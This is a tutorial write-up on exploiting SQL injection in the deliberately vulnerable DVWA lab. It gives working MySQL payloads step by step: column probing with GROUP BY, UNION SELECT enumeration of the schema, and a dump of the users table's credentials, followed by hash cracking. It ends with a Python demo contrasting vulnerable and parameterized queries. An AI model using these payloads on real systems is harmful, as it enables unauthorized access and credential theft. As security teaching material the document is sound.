DVWA: Damn Vulnerable Web Application SQL Injection Attack (Low Security)
"Disclaimer: The information provided in this article is intended for educational and research purposes only. It is not intended to promote or encourage any illegal or unethical activities. Always act responsibly and obtain proper consent before using any tools or techniques described in this article."
Damn Vulnerable Web App (DVWA) is a web application written in PHP that uses a MySQL database, where we can practice some common web vulnerabilities at different security levels. Basically, it is a place where we can legally test our hacking ability. In this article, we are only going to talk about one of the attacks in DVWA: SQL injection.
SQL injection, also known as SQLi, is an attack that executes malicious SQL code. SQL itself is a query language that can read, modify, and delete data. Hence, SQL injection allows attackers to do a lot of things with a web database, ranging from reading all the data in a database (e.g. finding the data for all students, as illustrated below) to altering data (e.g. changing bank account balances) and deleting it.
In this tutorial, we are going to exploit a SQL injection vulnerability on the Damn Vulnerable Web Application (DVWA).
Usually, the attacker has different tools to accomplish this task, such as:
Those two are the best known; by the way, in this tutorial we don't need them.
Lab requirements
- Kali Linux
- DVWA
This tutorial assumes you have set up the required lab environment to run the penetration test. If you need help setting up DVWA, please leave a comment and I will post an article about it soon.
Head to the DVWA login page now (e.g. http://target.site/dvwa). It will ask for a username and password. The default username is 'admin' and the password is 'password'.
Before we begin, we need to ensure that our DVWA security setting is low. This can be done by going to the DVWA Security tab and selecting low from the drop-down menu.
Now that we have our security setting configured, we can move on to exploiting the SQL injection!
We are ready to test our SQL injection attack on DVWA. The first step is to select “SQL injection” from the menu on the left.
I won't go in-depth into the concepts in this tutorial; however, I will soon post an article on learning SQL injection!
Let’s try to pass the following input to the form, just to check if the vulnerability is present:
Enter user ID ‘1’ and submit.
This is the result: a record is returned:
Now, instead of entering valid input like 1, try inputting a single quote character ( ' ) and observe its behavior.
The error message reveals that the database is MySQL. It also implies that a single quote may lead to SQL injection.
Next, input the classic SQL injection vector 1' OR 1='1, which combines the closing quote in 1' with the always-true condition 1='1.
And this is the result:
To enumerate the entire database, the next step is to check how many columns the original query returns. This can be done with the following vector.
This time, I'll use the "GROUP BY" technique. You can use "ORDER BY" too.
As a refresher: we append a GROUP BY clause to the query and set the index of the field; when the index doesn't exist it means that we are out of range, and the number of fields is one less than that index.
Our query should appear like this:
... GROUP BY <NUMBER> #
Where we have to replace “<NUMBER>” with an increasing index until we get an error.
So let’s try to pass as input the following strings:
1' GROUP BY 1 #
1' GROUP BY 2 #
1' GROUP BY 3 #
When we try with “index=3” the server raises an error and shows us this message:
So the number of columns returned is 2, which should be the first name and surname columns. This means the query involves two fields, which will be helpful when we try to get additional information using a UNION SELECT query.
We can check our assumption about the DBMS by typing:
1' OR 1=1 UNION SELECT 1, VERSION()#
The VERSION() function is a MySQL function that returns the value of the "version" system variable.
So, after clicking “Submit” and getting the result in the image below, we know that the DBMS is MySQL.
In the last row, we also get the version of the running DBMS: 5.0.51a.
Now it is time to obtain information about the schema. At this point we know that:
- The DBMS is MySQL 5.0.51a
- The query involves two fields
This step is optional, but we don’t want to be confused by too many results, so I prefer to get the current database name so that we can filter the results in the next step:
1' OR 1=1 UNION SELECT 1,DATABASE() #
Again, DATABASE() is a MySQL function, this one returning the name of the current database, so this is our result:
Clearly, the name we were looking for is “dvwa” in the last line!
Now we can continue and retrieve the table names using this query:
1' OR 1=1 UNION SELECT 1,table_name FROM information_schema.tables WHERE table_type='base table' AND table_schema='dvwa' #
The result is straightforward to understand; in particular, the table "users" at the end of the results looks interesting for our work.
In the end, we need to know the names of the columns of the target table.
The process to retrieve this information is the same as we used until now, let’s write our query:
1' OR 1=1 UNION SELECT 1, column_name FROM information_schema.columns WHERE table_name='users' #
This query shows all the column names in the table "users". If several schemas have a table with the same name, add a clause specifying the table_schema as well.
The highlighted fields are the ones we are interested in for the final phase.
At this point, we have all we need to perform our attack!
Retrieving the credentials
1' OR 1=1 UNION SELECT user, password FROM users #
The most promising row is the one inside the square (probably the credentials of an administrator account). This time the password is not stored as plain text, so we need one more step: cracking it.
Go to CrackStation, paste the recovered password into CrackStation's text area, solve the captcha and see the result!
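As an added example (not code from DVWA or from this write-up), here is a small Python model of the Low-level lookup on an in-memory sqlite3 database: the string-concatenated query beside its parameterized fix, the GROUP BY column probe from above run against both, and the credentials UNION payload. It assumes a constructed users table with placeholder hash values, and it ends the payloads with "-- " because sqlite3 does not accept MySQL's "#" comment marker.

```python
import sqlite3


def setup_db() -> sqlite3.Connection:
    # Constructed sample data modelled on DVWA's users table (not its real rows)
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users (user_id INTEGER PRIMARY KEY, first_name TEXT,
                            last_name TEXT, user TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'admin', 'admin', 'constructed-hash-1');
        INSERT INTO users VALUES (2, 'Gordon', 'Brown', 'gordonb', 'constructed-hash-2');
    """)
    return con


def lookup_vulnerable(con: sqlite3.Connection, user_id: str) -> list:
    # Low security: the input is spliced into the SQL text, so a quote closes
    # the string literal and everything after it is parsed as SQL.
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return con.execute(query).fetchall()


def lookup_parameterized(con: sqlite3.Connection, user_id: str) -> list:
    # The fix: the value is bound as data and is never parsed as SQL.
    query = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return con.execute(query, (user_id,)).fetchall()


def count_columns(lookup, con: sqlite3.Connection, limit: int = 10) -> int:
    # The GROUP BY probe from the write-up: raise the index until the database
    # errors; the column count is one less than the first failing index.
    # Returns 0 when no index errors, i.e. the endpoint leaks nothing.
    for n in range(1, limit + 1):
        try:
            lookup(con, f"1' GROUP BY {n} -- ")
        except sqlite3.OperationalError:
            return n - 1
    return 0


def demo() -> dict:
    con = setup_db()
    payload = "1' OR 1=1 UNION SELECT user, password FROM users -- "
    return {
        "benign": lookup_vulnerable(con, "1"),
        "injected": lookup_vulnerable(con, payload),  # leaks user/password rows
        "fixed": lookup_parameterized(con, payload),  # no row has that literal id
        "probe_vulnerable": count_columns(lookup_vulnerable, con),  # 2
        "probe_fixed": count_columns(lookup_parameterized, con),  # 0
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```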
This write-up of SQL injection against DVWA with the low security setting was pretty easy, but I hope it was as instructive as possible. Practice will make you more confident in approaching more complicated scenarios during penetration testing or bug hunting.
If you got stuck or have any questions, leave a comment, and I’ll do my best to get back to you.